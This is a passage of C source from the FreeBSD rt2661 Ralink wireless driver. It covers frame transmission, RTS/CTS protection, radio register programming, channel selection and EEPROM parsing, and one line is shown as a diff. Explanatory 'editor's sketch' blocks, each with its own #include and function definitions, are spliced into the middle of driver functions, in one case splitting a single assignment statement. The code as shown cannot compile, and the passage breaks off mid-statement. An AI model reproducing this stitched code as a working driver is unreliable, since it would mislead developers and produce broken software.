responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) flags |= RT2661_TX_TIMESTAMP; } rt2661_setup_tx_desc(sc, desc, flags, 0 /* XXX HWSEQ */, m0->m_pkthdr.len, rate, segs, nsegs, RT2661_QID_MGT); bus_dmamap_sync(sc->mgtq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->mgtq.desc_dmat, sc->mgtq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending mgt frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->mgtq.cur, rate); /* kick mgt */ sc->mgtq.queued++; sc->mgtq.cur = (sc->mgtq.cur + 1) % RT2661_MGT_RING_COUNT; RAL_WRITE(sc, RT2661_TX_CNTL_CSR, RT2661_KICK_MGT); return 0; } static int rt2661_sendprot(struct rt2661_softc *sc, int ac, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; struct rt2661_tx_ring *txq = &sc->txq[ac]; const struct ieee80211_frame *wh; struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; struct mbuf *mprot; int protrate, ackrate, pktlen, flags, isshort, error; uint16_t dur; bus_dma_segment_t segs[RT2661_MAX_SCATTER]; int nsegs; KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, const struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags = RT2661_TX_MORE_FRAG; if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags |= RT2661_TX_NEED_ACK; mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { /* XXX stat + msg */ return ENOBUFS; } data = &txq->data[txq->cur]; desc = &txq->desc[txq->cur]; error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, mprot, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(mprot); return error; } data->m = mprot; data->ni = ieee80211_ref_node(ni); /* ctl frames are not taken into account for amrr */ data->rix = IEEE80211_FIXED_RATE_NONE; rt2661_setup_tx_desc(sc, desc, flags, 0, mprot->m_pkthdr.len, protrate, segs, 1, ac); bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_PREWRITE); txq->queued++; txq->cur = (txq->cur + 1) % RT2661_TX_RING_COUNT; return 0; } static int rt2661_tx_data(struct rt2661_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, int ac) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rt2661_tx_ring *txq = &sc->txq[ac]; struct rt2661_tx_desc *desc; struct rt2661_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; const struct chanAccParams *cap; struct mbuf *mnew; bus_dma_segment_t segs[RT2661_MAX_SCATTER]; uint16_t dur; uint32_t flags; int error, nsegs, rate, noack = 0; wh = mtod(m0, struct ieee80211_frame *); tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { rate = tp->mcastrate; } else if (m0->m_flags & M_EAPOL) { rate = tp->mgmtrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = 
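/*
 * Editor's sketch: how rt2661_sendprot() below builds the NAV value carried
 * in the RTS or CTS-to-self frame.  frame_dur() and ack_dur() stand in for
 * net80211's ieee80211_compute_duration() and ieee80211_ack_duration(); the
 * point is the accounting: reserve the medium for the protected data frame
 * plus its ACK, and for RTS/CTS also for the CTS response, which is the same
 * size as an ACK.
 */
#include <stdbool.h>
#include <stdint.h>

enum prot { PROT_CTSONLY, PROT_RTSCTS };

static uint16_t
prot_nav(enum prot p, int pktlen, int rate, bool shortpre,
    uint16_t (*frame_dur)(int pktlen, int rate, bool shortpre),
    uint16_t (*ack_dur)(int rate, bool shortpre))
{
	uint16_t dur;

	dur = frame_dur(pktlen, rate, shortpre)	/* the protected data frame */
	    + ack_dur(rate, shortpre);		/* ... and its ACK */
	if (p == PROT_RTSCTS)
		dur += ack_dur(rate, shortpre);	/* CTS answering the RTS */
	return dur;
}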
tp->ucastrate; } else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } rate &= IEEE80211_RATE_VAL; if (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_QOS) { cap = &ic->ic_wme.wme_chanParams; noack = cap->cap_wmeParams[ac].wmep_noackPolicy; } - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } flags = 0; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { int prot = IEEE80211_PROT_NONE; if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) prot = IEEE80211_PROT_RTSCTS; else if ((ic->ic_flags & IEEE80211_F_USEPROT) && ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) prot = ic->ic_protmode; if (prot != IEEE80211_PROT_NONE) { error = rt2661_sendprot(sc, ac, m0, ni, prot, rate); if (error) { m_freem(m0); return error; } flags |= RT2661_TX_LONG_RETRY | RT2661_TX_IFS; } } data = &txq->data[txq->cur]; desc = &txq->desc[txq->cur]; error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } /* packet header have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { struct rt2661_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; /* remember link conditions for rate adaptation algorithm */ if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) { data->rix = ni->ni_txrate; /* XXX probably need last rssi value and not avg */ data->rssi = ic->ic_node_getrssi(ni); } else data->rix = IEEE80211_FIXED_RATE_NONE; if (!noack && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2661_TX_NEED_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); *(uint16_t *)wh->i_dur = htole16(dur); } rt2661_setup_tx_desc(sc, desc, flags, 0, m0->m_pkthdr.len, rate, segs, nsegs, ac); bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending data frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, txq->cur, rate); /* kick Tx */ txq->queued++; txq->cur = (txq->cur + 1) % RT2661_TX_RING_COUNT; RAL_WRITE(sc, RT2661_TX_CNTL_CSR, 1 << ac); return 0; } static void rt2661_start_locked(struct ifnet *ifp) { struct rt2661_softc *sc = ifp->if_softc; struct mbuf *m; struct ieee80211_node *ni; int ac; RAL_LOCK_ASSERT(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING) || sc->sc_invalid) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ac = M_WME_GETAC(m); if (sc->txq[ac].queued >= RT2661_TX_RING_COUNT - 1) { /* there is no place left in this ring */ IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (rt2661_tx_data(sc, m, ni, ac) != 
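/*
 * Editor's sketch: the transmit rate policy at the top of rt2661_tx_data()
 * above, as a pure function: multicast frames use the configured multicast
 * rate, EAPOL key handshakes use the (robust) management rate, a user-pinned
 * unicast rate wins next, and otherwise the rate-control module decides.
 * The sentinel value and callback are assumptions standing in for net80211's
 * IEEE80211_FIXED_RATE_NONE and ieee80211_ratectl_rate(); the final mask
 * strips the basic-rate flag as the driver does with IEEE80211_RATE_VAL.
 */
#include <stdbool.h>
#include <stdint.h>

#define FIXED_RATE_NONE	0xff	/* assumed sentinel */

struct txparams { uint8_t mcastrate, mgmtrate, ucastrate; };

static uint8_t
pick_tx_rate(const struct txparams *tp, bool mcast, bool eapol,
    uint8_t (*ratectl_rate)(void *node), void *node)
{
	uint8_t rate;

	if (mcast)
		rate = tp->mcastrate;		/* fixed multicast rate */
	else if (eapol)
		rate = tp->mgmtrate;		/* keep key handshakes robust */
	else if (tp->ucastrate != FIXED_RATE_NONE)
		rate = tp->ucastrate;		/* user-pinned rate */
	else
		rate = ratectl_rate(node);	/* adaptive choice */
	return rate & 0x7f;			/* strip the BASIC flag */
}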
0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } sc->sc_tx_timer = 5; } } static void rt2661_start(struct ifnet *ifp) { struct rt2661_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2661_start_locked(ifp); RAL_UNLOCK(sc); } static int rt2661_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct rt2661_softc *sc = ifp->if_softc; RAL_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (sc->mgtq.queued >= RT2661_MGT_RING_COUNT) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENOBUFS; /* XXX */ } ifp->if_opackets++; /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. * XXX raw path */ if (rt2661_tx_mgt(sc, m, ni) != 0) goto bad; sc->sc_tx_timer = 5; RAL_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; ieee80211_free_node(ni); RAL_UNLOCK(sc); return EIO; /* XXX */ } static void rt2661_watchdog(void *arg) { struct rt2661_softc *sc = (struct rt2661_softc *)arg; struct ifnet *ifp = sc->sc_ifp; RAL_LOCK_ASSERT(sc); KASSERT(ifp->if_drv_flags & IFF_DRV_RUNNING, ("not running")); if (sc->sc_invalid) /* card ejected */ return; if (sc->sc_tx_timer > 0 && --sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); rt2661_init_locked(sc); ifp->if_oerrors++; /* NB: callout is reset in rt2661_init() */ return; } callout_reset(&sc->watchdog_ch, hz, rt2661_watchdog, sc); } static int rt2661_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct rt2661_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: RAL_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { rt2661_init_locked(sc); startall = 1; } else rt2661_update_promisc(ifp); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rt2661_stop_locked(sc); } RAL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void rt2661_bbp_write(struct rt2661_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2661_PHY_CSR3) & RT2661_BBP_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP\n"); return; } tmp = RT2661_BBP_BUSY | (reg & 0x7f) << 8 | val; RAL_WRITE(sc, RT2661_PHY_CSR3, tmp); DPRINTFN(sc, 15, "BBP R%u <- 0x%02x\n", reg, val); } static uint8_t rt2661_bbp_read(struct rt2661_softc *sc, uint8_t reg) { uint32_t val; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2661_PHY_CSR3) & RT2661_BBP_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read from BBP\n"); return 0; } val = RT2661_BBP_BUSY | RT2661_BBP_READ | reg << 8; RAL_WRITE(sc, RT2661_PHY_CSR3, val); for (ntries = 0; ntries < 100; ntries++) { val = RAL_READ(sc, RT2661_PHY_CSR3); if (!(val & RT2661_BBP_BUSY)) return val & 0xff; DELAY(1); } device_printf(sc->sc_dev, "could not read from BBP\n"); return 0; } static void rt2661_rf_write(struct rt2661_softc *sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for 
(ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2661_PHY_CSR4) & RT2661_RF_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RT2661_RF_BUSY | RT2661_RF_21BIT | (val & 0x1fffff) << 2 | (reg & 3); RAL_WRITE(sc, RT2661_PHY_CSR4, tmp); /* remember last written value in sc */ sc->rf_regs[reg] = val; DPRINTFN(sc, 15, "RF R[%u] <- 0x%05x\n", reg & 3, val & 0x1fffff); } static int rt2661_tx_cmd(struct rt2661_softc *sc, uint8_t cmd, uint16_t arg) { if (RAL_READ(sc, RT2661_H2M_MAILBOX_CSR) & RT2661_H2M_BUSY) return EIO; /* there is already a command pending */ RAL_WRITE(sc, RT2661_H2M_MAILBOX_CSR, RT2661_H2M_BUSY | RT2661_TOKEN_NO_INTR << 16 | arg); RAL_WRITE(sc, RT2661_HOST_CMD_CSR, RT2661_KICK_CMD | cmd); return 0; } static void rt2661_select_antenna(struct rt2661_softc *sc) { uint8_t bbp4, bbp77; uint32_t tmp; bbp4 = rt2661_bbp_read(sc, 4); bbp77 = rt2661_bbp_read(sc, 77); /* TBD */ /* make sure Rx is disabled before switching antenna */ tmp = RAL_READ(sc, RT2661_TXRX_CSR0); RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp | RT2661_DISABLE_RX); rt2661_bbp_write(sc, 4, bbp4); rt2661_bbp_write(sc, 77, bbp77); /* restore Rx filter */ RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp); } /* * Enable multi-rate retries for frames sent at OFDM rates. * In 802.11b/g mode, allow fallback to CCK rates. */ static void rt2661_enable_mrr(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RAL_READ(sc, RT2661_TXRX_CSR4); tmp &= ~RT2661_MRR_CCK_FALLBACK; if (!IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan)) tmp |= RT2661_MRR_CCK_FALLBACK; tmp |= RT2661_MRR_ENABLED; RAL_WRITE(sc, RT2661_TXRX_CSR4, tmp); } static void rt2661_set_txpreamble(struct rt2661_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RAL_READ(sc, RT2661_TXRX_CSR4); tmp &= ~RT2661_SHORT_PREAMBLE; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RT2661_SHORT_PREAMBLE; RAL_WRITE(sc, RT2661_TXRX_CSR4, tmp); } static void rt2661_set_basicrates(struct rt2661_softc *sc, const struct ieee80211_rateset *rs) { #define RV(r) ((r) & IEEE80211_RATE_VAL) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t mask = 0; uint8_t rate; int i; for (i = 0; i < rs->rs_nrates; i++) { rate = rs->rs_rates[i]; if (!(rate & IEEE80211_RATE_BASIC)) continue; mask |= 1 << ieee80211_legacy_rate_lookup(ic->ic_rt, RV(rate)); } RAL_WRITE(sc, RT2661_TXRX_CSR5, mask); DPRINTF(sc, "Setting basic rate mask to 0x%x\n", mask); #undef RV } /* * Reprogram MAC/BBP to switch to a new band. Values taken from the reference * driver. 
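/*
 * Editor's sketch: the basic-rate bitmask written to RT2661_TXRX_CSR5 by
 * rt2661_set_basicrates() above (and to ARSP_PLCP_1 on the RT2560) is simply
 * "one bit per basic rate", with the bit index taken from the chip's rate
 * table.  rate_to_index() stands in for ieee80211_legacy_rate_lookup(); the
 * BASIC/VAL masks match the net80211 encoding of rate set entries.
 */
#include <stdint.h>

#define RATE_BASIC	0x80
#define RATE_VAL	0x7f

static uint32_t
basic_rate_mask(const uint8_t *rates, int nrates,
    int (*rate_to_index)(uint8_t rate_500kbps))
{
	uint32_t mask = 0;
	int i;

	for (i = 0; i < nrates; i++) {
		if (!(rates[i] & RATE_BASIC))
			continue;	/* not part of the basic rate set */
		mask |= 1u << rate_to_index(rates[i] & RATE_VAL);
	}
	return mask;
}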
*/ static void rt2661_select_band(struct rt2661_softc *sc, struct ieee80211_channel *c) { uint8_t bbp17, bbp35, bbp96, bbp97, bbp98, bbp104; uint32_t tmp; /* update all BBP registers that depend on the band */ bbp17 = 0x20; bbp96 = 0x48; bbp104 = 0x2c; bbp35 = 0x50; bbp97 = 0x48; bbp98 = 0x48; if (IEEE80211_IS_CHAN_5GHZ(c)) { bbp17 += 0x08; bbp96 += 0x10; bbp104 += 0x0c; bbp35 += 0x10; bbp97 += 0x10; bbp98 += 0x10; } if ((IEEE80211_IS_CHAN_2GHZ(c) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(c) && sc->ext_5ghz_lna)) { bbp17 += 0x10; bbp96 += 0x10; bbp104 += 0x10; } rt2661_bbp_write(sc, 17, bbp17); rt2661_bbp_write(sc, 96, bbp96); rt2661_bbp_write(sc, 104, bbp104); if ((IEEE80211_IS_CHAN_2GHZ(c) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(c) && sc->ext_5ghz_lna)) { rt2661_bbp_write(sc, 75, 0x80); rt2661_bbp_write(sc, 86, 0x80); rt2661_bbp_write(sc, 88, 0x80); } rt2661_bbp_write(sc, 35, bbp35); rt2661_bbp_write(sc, 97, bbp97); rt2661_bbp_write(sc, 98, bbp98); tmp = RAL_READ(sc, RT2661_PHY_CSR0); tmp &= ~(RT2661_PA_PE_2GHZ | RT2661_PA_PE_5GHZ); if (IEEE80211_IS_CHAN_2GHZ(c)) tmp |= RT2661_PA_PE_2GHZ; else tmp |= RT2661_PA_PE_5GHZ; RAL_WRITE(sc, RT2661_PHY_CSR0, tmp); } static void rt2661_set_chan(struct rt2661_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct rfprog *rfprog; uint8_t bbp3, bbp94 = RT2661_BBPR94_DEFAULT; int8_t power; u_int i, chan; chan = ieee80211_chan2ieee(ic, c); KASSERT(chan != 0 && chan != IEEE80211_CHAN_ANY, ("chan 0x%x", chan)); /* select the appropriate RF settings based on what EEPROM says */ rfprog = (sc->rfprog == 0) ? rt2661_rf5225_1 : rt2661_rf5225_2; /* find the settings for this channel (we know it exists) */ for (i = 0; rfprog[i].chan != chan; i++); power = sc->txpow[i]; if (power < 0) { bbp94 += power; power = 0; } else if (power > 31) { bbp94 += power - 31; power = 31; } /* * If we are switching from the 2GHz band to the 5GHz band or * vice-versa, BBP registers need to be reprogrammed. 
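/*
 * Editor's sketch: the Tx power clamping in rt2661_set_chan() above.  The RF
 * word only accepts a 5-bit power value (0..31); anything outside that range
 * is folded into BBP register 94 as an offset from its default, so the total
 * requested gain is approximately preserved.  The default is passed in here
 * rather than restating RT2661_BBPR94_DEFAULT numerically.
 */
#include <stdint.h>

static void
clamp_txpower(int8_t requested, int8_t bbp94_default,
    int8_t *rf_power, int8_t *bbp94)
{
	*bbp94 = bbp94_default;
	if (requested < 0) {
		*bbp94 += requested;		/* negative offset into BBP R94 */
		*rf_power = 0;
	} else if (requested > 31) {
		*bbp94 += requested - 31;	/* excess goes into BBP R94 */
		*rf_power = 31;
	} else
		*rf_power = requested;
}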
*/ if (c->ic_flags != sc->sc_curchan->ic_flags) { rt2661_select_band(sc, c); rt2661_select_antenna(sc); } sc->sc_curchan = c; rt2661_rf_write(sc, RAL_RF1, rfprog[i].r1); rt2661_rf_write(sc, RAL_RF2, rfprog[i].r2); rt2661_rf_write(sc, RAL_RF3, rfprog[i].r3 | power << 7); rt2661_rf_write(sc, RAL_RF4, rfprog[i].r4 | sc->rffreq << 10); DELAY(200); rt2661_rf_write(sc, RAL_RF1, rfprog[i].r1); rt2661_rf_write(sc, RAL_RF2, rfprog[i].r2); rt2661_rf_write(sc, RAL_RF3, rfprog[i].r3 | power << 7 | 1); rt2661_rf_write(sc, RAL_RF4, rfprog[i].r4 | sc->rffreq << 10); DELAY(200); rt2661_rf_write(sc, RAL_RF1, rfprog[i].r1); rt2661_rf_write(sc, RAL_RF2, rfprog[i].r2); rt2661_rf_write(sc, RAL_RF3, rfprog[i].r3 | power << 7); rt2661_rf_write(sc, RAL_RF4, rfprog[i].r4 | sc->rffreq << 10); /* enable smart mode for MIMO-capable RFs */ bbp3 = rt2661_bbp_read(sc, 3); bbp3 &= ~RT2661_SMART_MODE; if (sc->rf_rev == RT2661_RF_5325 || sc->rf_rev == RT2661_RF_2529) bbp3 |= RT2661_SMART_MODE; rt2661_bbp_write(sc, 3, bbp3); if (bbp94 != RT2661_BBPR94_DEFAULT) rt2661_bbp_write(sc, 94, bbp94); /* 5GHz radio needs a 1ms delay here */ if (IEEE80211_IS_CHAN_5GHZ(c)) DELAY(1000); } static void rt2661_set_bssid(struct rt2661_softc *sc, const uint8_t *bssid) { uint32_t tmp; tmp = bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24; RAL_WRITE(sc, RT2661_MAC_CSR4, tmp); tmp = bssid[4] | bssid[5] << 8 | RT2661_ONE_BSSID << 16; RAL_WRITE(sc, RT2661_MAC_CSR5, tmp); } static void rt2661_set_macaddr(struct rt2661_softc *sc, const uint8_t *addr) { uint32_t tmp; tmp = addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24; RAL_WRITE(sc, RT2661_MAC_CSR2, tmp); tmp = addr[4] | addr[5] << 8; RAL_WRITE(sc, RT2661_MAC_CSR3, tmp); } static void rt2661_update_promisc(struct ifnet *ifp) { struct rt2661_softc *sc = ifp->if_softc; uint32_t tmp; tmp = RAL_READ(sc, RT2661_TXRX_CSR0); tmp &= ~RT2661_DROP_NOT_TO_ME; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2661_DROP_NOT_TO_ME; RAL_WRITE(sc, RT2661_TXRX_CSR0, tmp); DPRINTF(sc, "%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ? "entering" : "leaving"); } /* * Update QoS (802.11e) settings for each h/w Tx ring. */ static int rt2661_wme_update(struct ieee80211com *ic) { struct rt2661_softc *sc = ic->ic_ifp->if_softc; const struct wmeParams *wmep; wmep = ic->ic_wme.wme_chanParams.cap_wmeParams; /* XXX: not sure about shifts. */ /* XXX: the reference driver plays with AC_VI settings too. */ /* update TxOp */ RAL_WRITE(sc, RT2661_AC_TXOP_CSR0, wmep[WME_AC_BE].wmep_txopLimit << 16 | wmep[WME_AC_BK].wmep_txopLimit); RAL_WRITE(sc, RT2661_AC_TXOP_CSR1, wmep[WME_AC_VI].wmep_txopLimit << 16 | wmep[WME_AC_VO].wmep_txopLimit); /* update CWmin */ RAL_WRITE(sc, RT2661_CWMIN_CSR, wmep[WME_AC_BE].wmep_logcwmin << 12 | wmep[WME_AC_BK].wmep_logcwmin << 8 | wmep[WME_AC_VI].wmep_logcwmin << 4 | wmep[WME_AC_VO].wmep_logcwmin); /* update CWmax */ RAL_WRITE(sc, RT2661_CWMAX_CSR, wmep[WME_AC_BE].wmep_logcwmax << 12 | wmep[WME_AC_BK].wmep_logcwmax << 8 | wmep[WME_AC_VI].wmep_logcwmax << 4 | wmep[WME_AC_VO].wmep_logcwmax); /* update Aifsn */ RAL_WRITE(sc, RT2661_AIFSN_CSR, wmep[WME_AC_BE].wmep_aifsn << 12 | wmep[WME_AC_BK].wmep_aifsn << 8 | wmep[WME_AC_VI].wmep_aifsn << 4 | wmep[WME_AC_VO].wmep_aifsn); return 0; } static void rt2661_update_slot(struct ifnet *ifp) { struct rt2661_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint8_t slottime; uint32_t tmp; slottime = (ic->ic_flags & IEEE80211_F_SHSLOT) ? 
9 : 20; tmp = RAL_READ(sc, RT2661_MAC_CSR9); tmp = (tmp & ~0xff) | slottime; RAL_WRITE(sc, RT2661_MAC_CSR9, tmp); } static const char * rt2661_get_rf(int rev) { switch (rev) { case RT2661_RF_5225: return "RT5225"; case RT2661_RF_5325: return "RT5325 (MIMO XR)"; case RT2661_RF_2527: return "RT2527"; case RT2661_RF_2529: return "RT2529 (MIMO XR)"; default: return "unknown"; } } static void rt2661_read_eeprom(struct rt2661_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { uint16_t val; int i; /* read MAC address */ val = rt2661_eeprom_read(sc, RT2661_EEPROM_MAC01); macaddr[0] = val & 0xff; macaddr[1] = val >> 8; val = rt2661_eeprom_read(sc, RT2661_EEPROM_MAC23); macaddr[2] = val & 0xff; macaddr[3] = val >> 8; val = rt2661_eeprom_read(sc, RT2661_EEPROM_MAC45); macaddr[4] = val & 0xff; macaddr[5] = val >> 8; val = rt2661_eeprom_read(sc, RT2661_EEPROM_ANTENNA); /* XXX: test if different from 0xffff? */ sc->rf_rev = (val >> 11) & 0x1f; sc->hw_radio = (val >> 10) & 0x1; sc->rx_ant = (val >> 4) & 0x3; sc->tx_ant = (val >> 2) & 0x3; sc->nb_ant = val & 0x3; DPRINTF(sc, "RF revision=%d\n", sc->rf_rev); val = rt2661_eeprom_read(sc, RT2661_EEPROM_CONFIG2); sc->ext_5ghz_lna = (val >> 6) & 0x1; sc->ext_2ghz_lna = (val >> 4) & 0x1; DPRINTF(sc, "External 2GHz LNA=%d\nExternal 5GHz LNA=%d\n", sc->ext_2ghz_lna, sc->ext_5ghz_lna); val = rt2661_eeprom_read(sc, RT2661_EEPROM_RSSI_2GHZ_OFFSET); if ((val & 0xff) != 0xff) sc->rssi_2ghz_corr = (int8_t)(val & 0xff); /* signed */ /* Only [-10, 10] is valid */ if (sc->rssi_2ghz_corr < -10 || sc->rssi_2ghz_corr > 10) sc->rssi_2ghz_corr = 0; val = rt2661_eeprom_read(sc, RT2661_EEPROM_RSSI_5GHZ_OFFSET); if ((val & 0xff) != 0xff) sc->rssi_5ghz_corr = (int8_t)(val & 0xff); /* signed */ /* Only [-10, 10] is valid */ if (sc->rssi_5ghz_corr < -10 || sc->rssi_5ghz_corr > 10) sc->rssi_5ghz_corr = 0; /* adjust RSSI correction for external low-noise amplifier */ if (sc->ext_2ghz_lna) sc->rssi_2ghz_corr -= 14; if (sc->ext_5ghz_lna) sc->rssi_5ghz_corr -= 14; DPRINTF(sc, "RSSI 2GHz corr=%d\nRSSI 5GHz corr=%d\n", sc->rssi_2ghz_corr, sc->rssi_5ghz_corr); val = rt2661_eeprom_read(sc, RT2661_EEPROM_FREQ_OFFSET); if ((val >> 8) != 0xff) sc->rfprog = (val >> 8) & 0x3; if ((val & 0xff) != 0xff) sc->rffreq = val & 0xff; DPRINTF(sc, "RF prog=%d\nRF freq=%d\n", sc->rfprog, sc->rffreq); /* read Tx power for all a/b/g channels */ for (i = 0; i < 19; i++) { val = rt2661_eeprom_read(sc, RT2661_EEPROM_TXPOWER + i); sc->txpow[i * 2] = (int8_t)(val >> 8); /* signed */ DPRINTF(sc, "Channel=%d Tx power=%d\n", rt2661_rf5225_1[i * 2].chan, sc->txpow[i * 2]); sc->txpow[i * 2 + 1] = (int8_t)(val & 0xff); /* signed */ DPRINTF(sc, "Channel=%d Tx power=%d\n", rt2661_rf5225_1[i * 2 + 1].chan, sc->txpow[i * 2 + 1]); } /* read vendor-specific BBP values */ for (i = 0; i < 16; i++) { val = rt2661_eeprom_read(sc, RT2661_EEPROM_BBP_BASE + i); if (val == 0 || val == 0xffff) continue; /* skip invalid entries */ sc->bbp_prom[i].reg = val >> 8; sc->bbp_prom[i].val = val & 0xff; DPRINTF(sc, "BBP 